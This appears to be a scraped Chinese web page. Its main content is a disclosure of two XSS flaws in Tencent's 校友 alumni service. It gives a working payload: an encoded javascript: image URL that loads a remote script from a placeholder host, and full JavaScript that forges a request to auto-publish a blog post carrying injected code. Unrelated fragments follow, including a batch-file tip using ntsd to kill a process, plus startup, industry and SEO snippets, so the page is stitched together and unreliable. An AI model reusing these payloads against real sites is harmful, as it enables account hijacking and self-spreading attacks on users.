作者:孤鸿影 作者已通知腾讯。 漏洞一: *** 校友 班级共享硬盘 上传文件时对文件描述没有做任何过滤,导致XSS。 *** 校友使用了Ajax技术,来显示文件列表。在文件Msharemsg.js中使用innerHTML输出文件列表的HTML代码。由于使用了innerHTML,所以直接插入代码: 不会被执行。使用下面的格式既可:。加入defer属性,那么浏览器在下载脚本的时候就不会立即对其进行处理,而是继续对页面进行下载和解析。这样我们插入的JavaScript就能正常运行。 漏洞二: *** 校友在发blog时对插入图片过滤不严格,存在xss漏洞 在发blog时将插入图片URL写为如下代码即可触发: javascript:document.write('%3C%73%63%72%69%70%74%20%73%72%63%3D%22http://xxxxxx.com/xy.js%22%3E%3C%2F%73%63%72%69%70%74%3E');xy.js的作用是自动发布一篇日志,这篇日志中可以插入恶意代码,代码如下: var url="/index.php?mod=blog&act=dopost"; var content="blog_content=By%3A%E5%AD%A4%E9%B8%BF%E5%BD%B1&blog_title=XSS+test&category=%E4%B8%AA%E4%BA%BA%E6%97%A5%E8%AE%B0"; //日志内容,这里可以插入恶意代码 function _sd_Post(Url, Args) { var xmlhttp; var error; eval('try {xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {xmlhttp = null;error=e;}'); if(null != xmlhttp) { xmlhttp.Open("POST", Url, false); xmlhttp.setRequestHeader("x-requested-with", "XMLHttpRequest"); xmlhttp.setRequestHeader("Referer", "http://xy.qq.com/api_proxy.html"); xmlhttp.setRequestHeader("Accept", "application/json, text/javascript, */*"); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.setRequestHeader("Host", "xy.qq.com"); xmlhttp.Send(Args); strText = xmlhttp.responseText; } } _sd_Post(url,content);
直接新建TXT,写入ntsd-cq-pnshake.exe,另存为.bat扩展名就可以了啊~注意保存的时候选"所有(*.*)" 你如果是txt文件的话可以直接输入路径G:\1\2.txt如果不是TXT...
创业是一个能让自己实现梦想的尝试,一个能改变自己人生的尝试,但同时也存在一定危险和机遇!俗话说的好“女怕嫁错郎,人怕入错行”,失败的原因就在于没有选择一个有潜力的行业,大家在创业时可以参考一下2019...
据中商产业研究院统计,通过分析对比今年前7个月33个主要工业行业利润与主营收入发现,最赚钱的是烟草,其次是医药,酒、饮料和精制茶制造业,食品制造业、汽车制造业。上述行业利润占主营收入比都在8%以上。...
什么是黑客对决 goodwell网络黑客QQ(goodwell) 网络黑客为何进攻支付宝钱包 欧盟国家会瓦解吗(欧盟解体) linux网络黑客能够用于干什么 手机上网络黑客学...
如今的社会,是社会经济发展快,各种各样机器设备和专业技能都是在发展趋势中,对90后创业者而言,要想得到工作上的取得成功,就需要持续的学习培训和持续的提高自己的工作能力,那样才可以在这个发展迅速的社会发...
1、 所有权结构从以往的经验来看,检索用户更喜欢50字节左右的标题;对于seo优化服务人员和编辑来说,太短的标题可能无法完全表达网页的主题;对于搜索引擎来说,太长的标题意味着“超标”,只保留前60字节...